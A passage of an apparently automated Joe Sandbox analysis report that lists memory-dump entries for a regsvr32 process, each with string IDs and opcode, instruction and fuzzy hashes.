                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: JLq
                                                  • API String ID: 0-4186083495
                                                  • Opcode ID: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                  • Instruction ID: 27128c2ca0a5d288d3179379bf0eddb2aee49c7a11679c2610c242e98f2fdc84
                                                  • Opcode Fuzzy Hash: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                  • Instruction Fuzzy Hash: 3C41D5B090064E8FDF48CF68C4865EE7BF1FB58358F114229E846AA254C7789A95CFD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: vYa-
                                                  • API String ID: 0-893662192
                                                  • Opcode ID: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                  • Instruction ID: ed719b7027dd4d7706803f37edca27847d3dc95415a6febebb675a1e15796353
                                                  • Opcode Fuzzy Hash: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                  • Instruction Fuzzy Hash: 0741C0B090034E8FCF48CF64D88A5DE7FB0FB68398F104619E856A6250D7B896A5CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: < dA
                                                  • API String ID: 0-2747138368
                                                  • Opcode ID: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                  • Instruction ID: 677e9d37894352eedc94dfbe70e1d5a5f16f85bbcaa69aa355918790c22682b0
                                                  • Opcode Fuzzy Hash: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                  • Instruction Fuzzy Hash: 2741A0B180074E8FCB49CF64D48A4DE7FB0FB68388F204619E856A6254D7B496A8CFD5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: w.
                                                  • API String ID: 0-4252102657
                                                  • Opcode ID: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                  • Instruction ID: 9835b62cc5c81bb08ffa4c0ed138b56601e81b85f9b16a4ced47218125f66503
                                                  • Opcode Fuzzy Hash: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                  • Instruction Fuzzy Hash: FC41E4B090434A8BCF48DF64C88A4DE7FB1FB58348F11861DEC5AA6250D7B496A9CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: }]T*
                                                  • API String ID: 0-3642313528
                                                  • Opcode ID: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                  • Instruction ID: a9b4d124700f7192ec0ffbe58db6f2cedd89af67995077d1789eaf9c0a4fefb8
                                                  • Opcode Fuzzy Hash: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                  • Instruction Fuzzy Hash: 624191B191074E9FCF48DF64D48A4DE7FB0FB68388F214619E816A6210D3B496A4CFD5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: w.
                                                  • API String ID: 0-4252102657
                                                  • Opcode ID: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                  • Instruction ID: 13a44cd4838b071505596f301d9460f32b91f3f909068c68e30d7ec81fe075ae
                                                  • Opcode Fuzzy Hash: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                  • Instruction Fuzzy Hash: 194104B090434A8BCF48CF64C88A4DE7FB1FB58348F10861DEC5AA6250D7B496A8CFC4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: N8$
                                                  • API String ID: 0-2933465586
                                                  • Opcode ID: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                  • Instruction ID: 297b3d980fd839d27da657b87e2df8633a1b9c783a0b67fb1012bddc2283f9fe
                                                  • Opcode Fuzzy Hash: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                  • Instruction Fuzzy Hash: 0241827180078E8FCB45CF64D88A4CE7FB0FB18358F105A19F865A7260D3B49664CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: wk
                                                  • API String ID: 0-1447520534
                                                  • Opcode ID: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                  • Instruction ID: ed1e7f9bc21f483ed76e74f249cc539d96e15df8e9c5d2752f3a18cd8a4680c8
                                                  • Opcode Fuzzy Hash: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                  • Instruction Fuzzy Hash: A041C4B180074E8BCB48DF68D48A4CE7FF0FB68398F10461DE859A6250D7B49AA4CFD5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: D7
                                                  • API String ID: 0-599489778
                                                  • Opcode ID: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                  • Instruction ID: 9ff7da26f915c3fd9b9081bc776a27ba1207aebd425a4d5bef8b93ab939ca450
                                                  • Opcode Fuzzy Hash: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                  • Instruction Fuzzy Hash: 4541B0B090074E8BCF48DF68D4965DE7FB0FB68388F20421DE816A6250D7B496A5CFD5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -
                                                  • API String ID: 0-2547686586
                                                  • Opcode ID: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                  • Instruction ID: fb4667ec304b728e9739446c3b2210f9efd75ae712771165d94948b9d3b69a1a
                                                  • Opcode Fuzzy Hash: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                  • Instruction Fuzzy Hash: E641D2B181038ECFCB48CFA4D88A5CE7BB1FB48358F115A09FC65A6224D3B49665CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Q
                                                  • API String ID: 0-2885194100
                                                  • Opcode ID: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                  • Instruction ID: a9705b719f6d6278401c973a571993bf085652b79919a3d293b183e1acac7421
                                                  • Opcode Fuzzy Hash: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                  • Instruction Fuzzy Hash: 9141F5B180434E8FCF48CFA4C84A4DE7FB1FB18318F004619EC5AA6250D7B49664CF85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: UA;k
                                                  • API String ID: 0-1243451539
                                                  • Opcode ID: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                  • Instruction ID: 446a4ee04f98266578c7fdeec7750357e9914a8a062f983f2ae732e753f3f9f0
                                                  • Opcode Fuzzy Hash: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                  • Instruction Fuzzy Hash: AC31E2B090034E8FCB48DF65C48A4DE7FB0FB68398F104619E859A6250D3B896A5CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BHj
                                                  • API String ID: 0-429444599
                                                  • Opcode ID: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                  • Instruction ID: 88d82d5a62f7e83910e755dc00f06a4804c179e3d48da98a41081325a3075538
                                                  • Opcode Fuzzy Hash: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                  • Instruction Fuzzy Hash: 2F31B2B190078E8FCF84DF64C88A5DE7BB0FB58358F010A09E869A6250D7B8D665CF85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: h
                                                  • API String ID: 0-130632579
                                                  • Opcode ID: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                  • Instruction ID: cf3c4ac770fe2f70a1efbbc55b0bf253fcb3f834dda7a796d3e0b8f6df5914ba
                                                  • Opcode Fuzzy Hash: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                  • Instruction Fuzzy Hash: 803102705187C48BD789CFA8C48965EFBE1FB94384F50492DF486867A0C7F8D948CB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ?%4
                                                  • API String ID: 0-422666221
                                                  • Opcode ID: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                  • Instruction ID: a7a624d76b7a6b6a49308da5d267df16e75217d08dbc55e4173753466c7a619f
                                                  • Opcode Fuzzy Hash: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                  • Instruction Fuzzy Hash: 0721A470628780AB878CDF28D49981BBBE1FBC9304F906A1CF9C68B364D7749445CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ve
                                                  • API String ID: 0-2619166483
                                                  • Opcode ID: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                  • Instruction ID: bd1518f744f48cc188204749d08526443734dde3f23549b257c943e1dafbc1e4
                                                  • Opcode Fuzzy Hash: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                  • Instruction Fuzzy Hash: 3B217BB16187858BC748DF28C55951ABBE1FBCC318F404B5DF8CAAA360D378D645CB4A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hk
                                                  • API String ID: 0-2736353058
                                                  • Opcode ID: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                  • Instruction ID: 887fdeaeec6620913bccc1519bb94b7ab545cc472d3a2f82c737665b3ebe67cb
                                                  • Opcode Fuzzy Hash: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                  • Instruction Fuzzy Hash: 20319CB4628384AB8388DF28C49981ABBF1FBC9304F806A1DF8868A260D775D445CB03
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @Bp!
                                                  • API String ID: 0-2853746471
                                                  • Opcode ID: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                  • Instruction ID: a42def5e4906ba5408d95fb28ee36c9633a666dd8c6a1d0dabe2f17b10b73553
                                                  • Opcode Fuzzy Hash: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                  • Instruction Fuzzy Hash: 8831F37080034E8BCB44DF64D48A4DE7FB0FB28398F11461AE869A6210D3B48694CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: _&%
                                                  • API String ID: 0-276555772
                                                  • Opcode ID: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                  • Instruction ID: 84b034befa84842a6d26d9f5413634863003efd6eec9a48b68f2958c9e87747a
                                                  • Opcode Fuzzy Hash: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                  • Instruction Fuzzy Hash: C3217BB06187848B8748DF28D45A51ABBE1FBCC308F404B5DF4CAAA360D3789609CB4A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: V
                                                  • API String ID: 0-2990084971
                                                  • Opcode ID: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                  • Instruction ID: 19a784c3393b647e1d02845cf9d1e0035701b9012461bc7b4b972f754d4b287b
                                                  • Opcode Fuzzy Hash: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                  • Instruction Fuzzy Hash: E021ADB4529780AFD788DF28D09981FBBF0FB89304F806A1CF9868B360E3759445CB02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fe_
                                                  • API String ID: 0-1346747655
                                                  • Opcode ID: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                  • Instruction ID: 9f8913945123cb4278df7be958afc5fc5d749fa594805d3e5c5ffa2821aade6f
                                                  • Opcode Fuzzy Hash: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                  • Instruction Fuzzy Hash: 25215DB55183818B9348EF28D44A51BBBE1BB8D34CF404B5DF4CEAA260D778D615CF4A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                  • Instruction ID: f4bbdddc4ebc6fe898ddfb3184844cd7ab88b5746f894e32bccfd4327ba112cf
                                                  • Opcode Fuzzy Hash: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                  • Instruction Fuzzy Hash: F751247152078DABDBC9DF28C8CAA9C3BA1FB44754F806219FC468A261D774D5C9CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                  • Instruction ID: d7e3191637b78f1be9ff87ab698ad538cd7d2d45c46478ba59590cd585685a95
                                                  • Opcode Fuzzy Hash: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                  • Instruction Fuzzy Hash: 5761B1B490078E8FCF48DF68D8595DE7BB0FB48318F014A19FC6696250D7B49A25CB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                  • Instruction ID: f17689cc06c9532d3252f7dc5abd3373f404a3f8166a5e21e79f0a6996b359c5
                                                  • Opcode Fuzzy Hash: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                  • Instruction Fuzzy Hash: 0B41B870608B488FC768DF19D08976ABBF1FB89711F40856EE68AC7351DB319848CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                  • Instruction ID: 9422144e28ecc4a9930a11d21f18f8515329dd70f686b1b52883d16e1825d5f7
                                                  • Opcode Fuzzy Hash: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                  • Instruction Fuzzy Hash: 2A414D34509B588FD768DF28918A75ABBE0FF99310F004A5EE58EC7362D770D949CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                  • Instruction ID: bbd244a3cf3555809e115011e05a98a3e8d5fd40b217627e69400f11bfb30a94
                                                  • Opcode Fuzzy Hash: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                  • Instruction Fuzzy Hash: 745193B590434ACFCF48CF64D48A5CE7FB0FB68398F214219E856A6250D3B496A4CFD5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 22d6ccee6f38bff831197d2bb081fadbeca5e8b7e3ae62232a51f5952ffcfbdb
                                                  • Instruction ID: 8b5374169f69602128bd3032aff790cb1f354843cf4962b6e845d1f3af7287dc
                                                  • Opcode Fuzzy Hash: 22d6ccee6f38bff831197d2bb081fadbeca5e8b7e3ae62232a51f5952ffcfbdb
                                                  • Instruction Fuzzy Hash: 9741A0B180078E8BCB44CFA8D84A5DE7BF0FB18358F104A19F865A6250D3B89668CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c574afae7ba18edac7d834e0abd82c8c7458f2e927091ead9319fe9aa7316d5f
                                                  • Instruction ID: c15f1aaae4e4e13c906589d5588e8395ab5dda45948680e718f465f07a8a5b6e
                                                  • Opcode Fuzzy Hash: c574afae7ba18edac7d834e0abd82c8c7458f2e927091ead9319fe9aa7316d5f
                                                  • Instruction Fuzzy Hash: EC41C4B190038E8FDF48CF64C84A4DE7BB0FB58358F104619E86AA7250D3B8D665CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4afcbbeb8beafd70164a818e9f41371ad943d797e3468922fcea1c7c9f2e7631
                                                  • Instruction ID: c896a4b3abc40741a1500648b31ed7fd3e584cfdc10005e9d212c87c64feccae
                                                  • Opcode Fuzzy Hash: 4afcbbeb8beafd70164a818e9f41371ad943d797e3468922fcea1c7c9f2e7631
                                                  • Instruction Fuzzy Hash: 2541C1B181035E8BDB48CFA8D48A5DE7FB0FB68398F204619E855A6214D3B496A4CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6edc2e1e82c131bcdf0495892124b6f46e3b6b242b9e6d8eacab558a4eb6cfc8
                                                  • Instruction ID: db142853bc0ceb5379a440845187b42230294cb0dc3411c083ed269e5703ce5c
                                                  • Opcode Fuzzy Hash: 6edc2e1e82c131bcdf0495892124b6f46e3b6b242b9e6d8eacab558a4eb6cfc8
                                                  • Instruction Fuzzy Hash: E831AFB090034E8FCB48CF68C4865DE7FB0FB58398F114219E85AA6210D3B496A5CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c455d63c0866516b303eef6870e820fc06907d5cf01b5e138b1643b6a977dfc
                                                  • Instruction ID: 032a8ed253072f6fd1b05e82d0325949fdf78283cb4c6b9cd1929990fdaa7975
                                                  • Opcode Fuzzy Hash: 6c455d63c0866516b303eef6870e820fc06907d5cf01b5e138b1643b6a977dfc
                                                  • Instruction Fuzzy Hash: F93195B050078A8BCF48DF68C85A5AE3BB1FB48308B404A2DFD269A350D7B49664CB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91382f82a540e9ea2bbfb40e05a393f87671ab464d1f075959bb3f3378a52dce
                                                  • Instruction ID: 9b1437c5de0cc84ebb9c914bb54d42d7cbbf0eefc466e3cb3beb54b329be6ed5
                                                  • Opcode Fuzzy Hash: 91382f82a540e9ea2bbfb40e05a393f87671ab464d1f075959bb3f3378a52dce
                                                  • Instruction Fuzzy Hash: E631D5B190034E8FCF48DF68C48A4DE7FB1FB68398F100619E816A6250D3B896A4CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
